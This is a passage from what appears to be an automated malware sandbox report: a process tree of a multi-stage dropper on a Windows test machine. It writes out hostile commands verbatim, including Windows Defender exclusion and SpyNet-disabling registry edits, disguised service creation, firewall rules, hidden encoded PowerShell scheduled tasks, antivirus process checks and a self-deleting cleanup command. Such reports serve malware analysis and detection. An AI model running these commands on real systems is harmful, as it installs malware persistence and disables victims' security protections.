                                                                                  Accostarmi.exe.pif N
                                                                                  6⤵
                                                                                    PID:2464
                                                                            • C:\Users\Admin\Documents\UWCTD8a6dLcIHtKZQpRzxTAo.exe
                                                                              "C:\Users\Admin\Documents\UWCTD8a6dLcIHtKZQpRzxTAo.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5472
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htiznmqc\
                                                                                4⤵
                                                                                  PID:6912
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\orhgzbil.exe" C:\Windows\SysWOW64\htiznmqc\
                                                                                  4⤵
                                                                                    PID:6044
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    "C:\Windows\System32\sc.exe" create htiznmqc binPath= "C:\Windows\SysWOW64\htiznmqc\orhgzbil.exe /d\"C:\Users\Admin\Documents\UWCTD8a6dLcIHtKZQpRzxTAo.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                    4⤵
                                                                                      PID:5944
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      "C:\Windows\System32\sc.exe" description htiznmqc "wifi internet conection"
                                                                                      4⤵
                                                                                        PID:7100
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        "C:\Windows\System32\sc.exe" start htiznmqc
                                                                                        4⤵
                                                                                          PID:2016
                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                          4⤵
                                                                                            PID:6552
                                                                                        • C:\Users\Admin\Documents\4dGDO57muTlVmBNuHJqa4Lc4.exe
                                                                                          "C:\Users\Admin\Documents\4dGDO57muTlVmBNuHJqa4Lc4.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5464
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSB7D4.tmp\Install.exe
                                                                                            .\Install.exe
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5276
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSD5EB.tmp\Install.exe
                                                                                              .\Install.exe /S /site_id "525403"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:5500
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                6⤵
                                                                                                  PID:6856
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                    7⤵
                                                                                                      PID:5536
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                        8⤵
                                                                                                          PID:2184
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                          8⤵
                                                                                                            PID:6972
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5444
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                          7⤵
                                                                                                            PID:4696
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                              8⤵
                                                                                                                PID:5540
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                8⤵
                                                                                                                  PID:6952
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "gSkrnpBzL" /SC once /ST 00:36:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                              6⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:3492
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "gSkrnpBzL"
                                                                                                              6⤵
                                                                                                                PID:5704
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "gSkrnpBzL"
                                                                                                                6⤵
                                                                                                                  PID:6712
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:3892
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\WdlkXeV.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                  6⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:6120
                                                                                                          • C:\Users\Admin\Documents\7S5mYHFmhfMX6TjEu9RnHSJY.exe
                                                                                                            "C:\Users\Admin\Documents\7S5mYHFmhfMX6TjEu9RnHSJY.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5456
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                                              4⤵
                                                                                                                PID:7144
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout 45
                                                                                                                  5⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:6712
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                                                                                                                4⤵
                                                                                                                  PID:4792
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                  4⤵
                                                                                                                    PID:7096
                                                                                                                • C:\Users\Admin\Documents\5wJDQQvLroROSyOv6uw3yyWD.exe
                                                                                                                  "C:\Users\Admin\Documents\5wJDQQvLroROSyOv6uw3yyWD.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5444
                                                                                                                  • C:\Users\Admin\Documents\8YO4IWAEkk0QMMCu2P1h8FnH.exe
                                                                                                                    "C:\Users\Admin\Documents\8YO4IWAEkk0QMMCu2P1h8FnH.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5320
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 460
                                                                                                                      4⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5992
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 500
                                                                                                                      4⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6180
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pub2.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:4368
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3812
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Installation.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Installation.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4136
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Installations.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Installations.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4564
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2184
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\setup_install.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\setup_install.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2784
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c jobiea_8.exe
                                                                                                                          6⤵
                                                                                                                            PID:1380
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_8.exe
                                                                                                                              jobiea_8.exe
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1860
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c jobiea_7.exe
                                                                                                                            6⤵
                                                                                                                              PID:1696
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c jobiea_6.exe
                                                                                                                              6⤵
                                                                                                                                PID:4700
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c jobiea_5.exe
                                                                                                                                6⤵
                                                                                                                                  PID:368
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c jobiea_4.exe
                                                                                                                                  6⤵
                                                                                                                                    PID:4460
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c jobiea_3.exe
                                                                                                                                    6⤵
                                                                                                                                      PID:4712
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c jobiea_2.exe
                                                                                                                                      6⤵
                                                                                                                                        PID:2232
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c jobiea_1.exe
                                                                                                                                        6⤵
                                                                                                                                          PID:2272
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1BCik7
                                                                                                                                    3⤵
                                                                                                                                      PID:3236
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc876c46f8,0x7ffc876c4708,0x7ffc876c4718
                                                                                                                                        4⤵
                                                                                                                                          PID:2496
                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:2272
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_1.exe
                                                                                                                                        jobiea_1.exe
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        PID:3048
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 932
                                                                                                                                          3⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:3848
                                                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                      1⤵
                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                      PID:3776
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5048
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 600
                                                                                                                                          3⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:5036
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5048 -ip 5048
                                                                                                                                      1⤵
                                                                                                                                        PID:1476
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_2.exe
                                                                                                                                        jobiea_2.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:3300
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_6.exe
                                                                                                                                        jobiea_6.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:3892
                                                                                                                                          • C:\Users\Admin\Documents\19nrul0hofmCBDKv0yQVcBb5.exe
                                                                                                                                            "C:\Users\Admin\Documents\19nrul0hofmCBDKv0yQVcBb5.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4004
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f635ebdd-159b-42c1-8763-924a6652cf1d.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\f635ebdd-159b-42c1-8763-924a6652cf1d.exe"
                                                                                                                                              3⤵
                                                                                                                                                PID:5172
                                                                                                                                            • C:\Users\Admin\Documents\rROmvby7m5_W9uiqNkLtFwNE.exe
                                                                                                                                              "C:\Users\Admin\Documents\rROmvby7m5_W9uiqNkLtFwNE.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4600
                                                                                                                                            • C:\Users\Admin\Documents\6VAdJrP6T72tfUJHlNNMp4Kx.exe
                                                                                                                                              "C:\Users\Admin\Documents\6VAdJrP6T72tfUJHlNNMp4Kx.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5360
                                                                                                                                            • C:\Users\Admin\Documents\rOSE_h4m2NcYtGPJZ7991cPK.exe
                                                                                                                                              "C:\Users\Admin\Documents\rOSE_h4m2NcYtGPJZ7991cPK.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3868
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                3⤵
                                                                                                                                                  PID:6492
                                                                                                                                              • C:\Users\Admin\Documents\PoxwX8bTWaeC7uK_meYFOtDl.exe
                                                                                                                                                "C:\Users\Admin\Documents\PoxwX8bTWaeC7uK_meYFOtDl.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:5916
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2140
                                                                                                                                                  • C:\Users\Admin\Documents\s9EY2I7qnRgwTgTOoTW1wUF8.exe
                                                                                                                                                    "C:\Users\Admin\Documents\s9EY2I7qnRgwTgTOoTW1wUF8.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:5232
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3696
                                                                                                                                                    • C:\Users\Admin\Documents\OziJH7tuOxkJHmyR3_2iiqzB.exe
                                                                                                                                                      "C:\Users\Admin\Documents\OziJH7tuOxkJHmyR3_2iiqzB.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5236
                                                                                                                                                    • C:\Users\Admin\Documents\3saEhYZYxMxsDFIywZT_Qbca.exe
                                                                                                                                                      "C:\Users\Admin\Documents\3saEhYZYxMxsDFIywZT_Qbca.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5268
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4952
                                                                                                                                                        • C:\Users\Admin\Documents\rPik1pfTyuTNCHt0rV6wj4NI.exe
                                                                                                                                                          "C:\Users\Admin\Documents\rPik1pfTyuTNCHt0rV6wj4NI.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:6020
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6920
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6692
                                                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                    PID:2016
                                                                                                                                                                  • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                    find /I /N "bullguardcore.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5604
                                                                                                                                                                    • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                      find /I /N "psuaservice.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6736
                                                                                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                        PID:6276
                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5992
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Accostarmi.exe.pif
                                                                                                                                                                          Accostarmi.exe.pif N
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5384
                                                                                                                                                                    • C:\Users\Admin\Documents\nR13DgmGK7092lvCZMEvXjfp.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\nR13DgmGK7092lvCZMEvXjfp.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5380
                                                                                                                                                                      • C:\Users\Admin\Documents\BsyoiWMKvMei4fXlhWSPq608.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\BsyoiWMKvMei4fXlhWSPq608.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5732
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 616
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:2072
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 616
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4204
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 668
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5976
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 904
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6612
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 796
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6652
                                                                                                                                                                      • C:\Users\Admin\Documents\u54UxaQRCIo7nI34ZGWNiA02.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\u54UxaQRCIo7nI34ZGWNiA02.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3172
                                                                                                                                                                          • C:\Users\Admin\Documents\u54UxaQRCIo7nI34ZGWNiA02.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\u54UxaQRCIo7nI34ZGWNiA02.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3668
                                                                                                                                                                          • C:\Users\Admin\Documents\2mBLnhQ1Fbmv6pP5_wC4wYzy.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\2mBLnhQ1Fbmv6pP5_wC4wYzy.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5340
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5108
                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4860
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1032
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:6216
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1040
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:5536
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1060
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:1576
                                                                                                                                                                              • C:\Users\Admin\Documents\dWD0ga_9nD7Fs6ZN3VfIcIyN.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\dWD0ga_9nD7Fs6ZN3VfIcIyN.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:3764
                                                                                                                                                                              • C:\Users\Admin\Documents\x5IDBFNa9nMjqLPz02Gshu2k.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\x5IDBFNa9nMjqLPz02Gshu2k.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:5200
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im x5IDBFNa9nMjqLPz02Gshu2k.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\x5IDBFNa9nMjqLPz02Gshu2k.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5268
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3684
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im x5IDBFNa9nMjqLPz02Gshu2k.exe /f
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5364
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:4976
                                                                                                                                                                                • C:\Users\Admin\Documents\VSg5FIK5vnNVQolSTAGXZ7Ti.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\VSg5FIK5vnNVQolSTAGXZ7Ti.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5204
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 432
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:6932
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 452
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:1164
                                                                                                                                                                                • C:\Users\Admin\Documents\Dw2nwDd41MYFu6D8uq49Jf8g.exe
